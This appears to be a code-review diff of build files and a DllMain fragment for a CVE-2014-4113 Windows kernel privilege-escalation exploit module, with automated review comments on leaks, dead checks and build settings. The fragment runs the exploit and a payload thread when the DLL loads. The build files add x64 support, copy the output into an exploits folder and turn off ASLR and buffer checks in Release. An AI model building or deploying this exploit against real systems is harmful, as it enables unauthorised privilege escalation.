CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL); CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
return;
} }
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) { BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
BOOL bReturnValue = TRUE; BOOL bReturnValue = TRUE;
switch (dwReason) { switch (dwReason)
{
case DLL_QUERY_HMODULE: case DLL_QUERY_HMODULE:
hAppInstance = hinstDLL; hAppInstance = hinstDLL;
if (lpReserved != NULL) { if (lpReserved != NULL)
{
*(HMODULE *)lpReserved = hAppInstance; *(HMODULE *)lpReserved = hAppInstance;
} }
break; break;
case DLL_PROCESS_ATTACH: case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL; hAppInstance = hinstDLL;
Win32kNullPage(lpReserved); win32k_null_page(lpReserved);
break; break;
case DLL_PROCESS_DETACH: case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH: case DLL_THREAD_ATTACH:
@ -487,4 +496,4 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
break; break;
} }
return bReturnValue; return bReturnValue;
}; }
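Review bot: The `if (szNtName == NULL)` test in win32k_null_page compares the address of a local char array, which is never NULL, so the "nt not found" branch is dead; the intended check after the module loop is `if (szNtName[0] == '\0')`. In the same function the buffer returned by `LocalAlloc(LMEM_ZEROINIT, ulSystemInfoBufferSize)` is never released on any path, so a `LocalFree(pSystemInfoBuffer);` once `smi` has been parsed (and before each early `return` that follows the allocation) would close the leak. As a point of style, the cast-as-lvalue assignments such as `(DWORD_PTR)lpPtr = 0x10000000B;` rely on an MSVC extension rather than standard C; assigning through a `DWORD_PTR` temporary and casting on the read side keeps the code portable across compilers. The hardcoded `versionInfo.dwOSVersionInfoSize = 148;` would read better as `sizeof(OSVERSIONINFOA)`, which is what the memset on the previous line already uses.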


@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations"> <ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32"> <ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration> <Configuration>Debug</Configuration>
@ -19,132 +19,224 @@
</ProjectConfiguration> </ProjectConfiguration>
</ItemGroup> </ItemGroup>
<PropertyGroup Label="Globals"> <PropertyGroup Label="Globals">
<ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid> <ProjectGuid>{E80F11CD-6698-492F-B4B0-1A2348A24BB0}</ProjectGuid>
<RootNamespace>cve20144113</RootNamespace> <RootNamespace>cve-2014-4113</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup> </PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType> <ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet> <CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset> <WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType> <ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet> <CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset> <WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup> </PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings"> <ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup> </ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> <ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup> </ImportGroup>
<PropertyGroup Label="UserMacros" /> <PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> <PropertyGroup>
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath> <_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
</PropertyGroup> <OutDir>$(Configuration)\$(Platform)\</OutDir>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <IntDir>$(Configuration)\$(Platform)\</IntDir>
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath> <LinkIncremental>false</LinkIncremental>
</PropertyGroup> <GenerateManifest>false</GenerateManifest>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath> <CodeAnalysisRules />
</PropertyGroup> <CodeAnalysisRuleAssemblies />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
</PropertyGroup> </PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile> <ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization> <Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking> <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<IntrinsicFunctions>true</IntrinsicFunctions> <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile> </ClCompile>
<Link> <Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>true</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences> <SubSystem>Windows</SubSystem>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile> <TargetMachine>MachineX86</TargetMachine>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link> </Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile> <ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization> <Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking> <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<IntrinsicFunctions>true</IntrinsicFunctions> <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile> </ClCompile>
<Link> <Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>true</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences> <SubSystem>Windows</SubSystem>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile> <ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link> </Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile> <ClCompile>
<CompileAs>CompileAsC</CompileAs> <Optimization>MinSpace</Optimization>
<WarningLevel>Level3</WarningLevel> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<Optimization>Disabled</Optimization> <IntrinsicFunctions>false</IntrinsicFunctions>
<FunctionLevelLinking>true</FunctionLevelLinking> <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<IntrinsicFunctions>true</IntrinsicFunctions> <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<CompileAs>Default</CompileAs> <StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile> </ClCompile>
<Link> <Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation> <GenerateDebugInformation>false</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences> <GenerateMapFile>true</GenerateMapFile>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile> <MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link> </Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile> <ClCompile>
<CompileAs>CompileAsC</CompileAs> <Optimization>MinSpace</Optimization>
<WarningLevel>Level3</WarningLevel> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<Optimization>Disabled</Optimization> <IntrinsicFunctions>false</IntrinsicFunctions>
<FunctionLevelLinking>true</FunctionLevelLinking> <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<IntrinsicFunctions>true</IntrinsicFunctions> <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<CompileAs>Default</CompileAs> <StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile> </ClCompile>
<Link> <Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation> <GenerateDebugInformation>false</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences> <GenerateMapFile>true</GenerateMapFile>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile> <MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link> </Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.01 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemGroup> <ItemGroup>
<ClCompile Include="cve-2014-4113.c" /> <ClCompile Include="cve-2014-4113.c" />
</ItemGroup> </ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets"> <ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup> </ImportGroup>
</Project> </Project>
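Review bot: The x64 PostBuildEvent commands hand editbin different subsystem versions — `/SUBSYSTEM:WINDOWS,4.0` in Debug|x64 and `/SUBSYSTEM:WINDOWS,5.01` in Release|x64 — and both appear to sit below the 5.02 floor that the linker documentation gives for x64 images, so editbin may be rejecting them, in which case the trailing `exit 0` in the Debug commands hides the failure and leaves the header untouched. Aligning both x64 configurations on one value, e.g. `/SUBSYSTEM:WINDOWS,5.02`, and dropping `exit 0` so a failed editbin surfaces in the build log would make the intent explicit; if the differing values are deliberate, an XML comment next to the commands saying why would do. Separately, the Release groups set `<BufferSecurityCheck>false</BufferSecurityCheck>` and `<RandomizedBaseAddress>false</RandomizedBaseAddress>` and leave `<DataExecutionPrevention>` empty with no explanation; a one-line comment stating whether the reflective-loading setup actually needs these settings (or removing them if it does not) would keep a future maintainer from silently flipping them.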


@ -4,14 +4,15 @@
<SolutionPath>.\cve-2014-4113.sln</SolutionPath> <SolutionPath>.\cve-2014-4113.sln</SolutionPath>
</PropertyGroup> </PropertyGroup>
<Target Name="all" DependsOnTargets="x86" /> <Target Name="all" DependsOnTargets="x86;x64" />
<Target Name="x86"> <Target Name="x86">
<Message Text="Building CVE-2014-4113 win32k_null_page x86 Release version" /> <Message Text="Building CVE-2014-4113 track_popup_menu x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/> <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target> </Target>
<Target Name="x64"> <Target Name="x64">
<Message Text="CVE-2014-4113 is not supported in x64" /> <Message Text="Building CVE-2014-4113 track_popup_menu x64 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
</Target> </Target>
</Project> </Project>
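Review bot: The new x64 target's `<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>` requests `Clean` and then `Rebuild`, and MSBuild's `Rebuild` target already runs `Clean` before `Build`, so the solution is cleaned twice; `Targets="Rebuild"` alone does the same work. The existing x86 target carries the same redundancy, so this is an inherited pattern rather than a defect introduced here, but copying it is a good moment to trim both.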


@ -48,7 +48,7 @@ IF "%ERRORLEVEL%"=="0" (
) )
IF "%ERRORLEVEL%"=="0" ( IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2014-4113 (win32k_null_page)" ECHO "Building CVE-2014-4113 (track_popup_menu)"
PUSHD CVE-2014-4113 PUSHD CVE-2014-4113
msbuild.exe make.msbuild /target:%PLAT% msbuild.exe make.msbuild /target:%PLAT%
POPD POPD